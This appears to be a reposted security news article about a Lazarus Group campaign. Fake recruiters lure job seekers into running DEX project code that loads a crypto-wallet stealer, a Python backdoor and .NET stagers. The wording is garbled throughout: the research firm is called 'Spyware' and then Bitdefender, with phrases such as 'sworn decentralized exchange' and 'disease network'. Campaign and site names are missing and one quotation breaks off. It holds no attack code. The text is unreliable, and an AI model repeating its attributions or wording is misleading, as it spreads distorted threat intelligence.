Cross-Platform JavaScript Stealer Targets Crypto Wallets in New Lazarus Group Campaign

Feb 05, 2025Ravie LakshmananCryptocurrency / Data Breach

A false LinkedIn job offer in the crypto and traveling sectors, as well as malware that can infect Windows, macOS, and Linux operating systems, has been linked to the North Korea-linked Lazarus Group.

According to security firm Spyware, the hoax begins with a message sent on a professional social media network, enticing them with the promise of remote work, part-time freedom, and good pay.

The scam requests a Resume or even a specific GitHub repository link once the goal expresses interest, according to a report shared with The Hacker News.

” Although evidently innocent, these requests is function wicked purposes, such as cutting personal information or lending a facade of legitimacy to the conversation”.

Once the necessary information is obtained, the attack moves to the next stage, where the threat actor, acting as a recruiter, posts a link to a GitHub or Bitbucket repository with a minimum viable product ( MVP ) version of a sworn decentralized exchange ( DEX ) project and asks the victim to check it out and offer their feedback.

An disguised script that is configured to get a next-stage payload from api is present in the code. npoint [. ] io is a cross-platform Browser information stealer that can eavesdrop on information from various bitcoin wallet extensions that might be installed on the victim’s browser.

The grabber also doubles as a loader to get a Python-based backdoor that is responsible for keeping track of changes to clipboard content, preserving frequent remote access, and removing additional malware.

The tactics described by Bitdefender’s exhibit overlap with a known attack activity cluster called ( also known as DeceptiveDevelopment and DEV#POPPER ), which is intended to drop a JavaScript stealer called BeaverTail and a Python implant known as InvisibleFerret.

The malware deployed by means of the Python malware is a.NET binary that can download and start a TOR proxy server to communicate with a command-and-control ( C2 ) server, exfiltrate basic system information, and deliver another payload that, in turn, can siphon sensitive data, log keystrokes, and launch a cryptocurrency miner.

The threat actors ‘ disease network is” complex, containing malicious software that is written in multiple programming languages and is used by a variety of technologies, including.NET-based stagers capable of disabling protection tools, setting up a Tor proxy, and launching crypto miners,” according to Bitdefender. These include multi-layered Python scripts that recursively decode and kill themselves, a JavaScript stealer that first gathers computer data before pivoting to additional payloads, and.NET-based stage

According to reports shared on and , there is evidence that these efforts are quite common, with minor adjustments to the overall attack chain. In some circumstances, candidates are required to clone a Web3 repository and install it locally as part of an interview, while in others, they are instructed to fix intentionally bugged code.

A project with the name “” is referenced in one of the Bitbucket repositories in question. It is no longer accessible through the code hosting platform.

The information comes a day after SentinelOne that another malware codenamed FlexibleFerret is being distributed through the Contagious Interview campaign.

Found this article interesting? Follow us on and Twitter to access more exclusive content.

Leave a Comment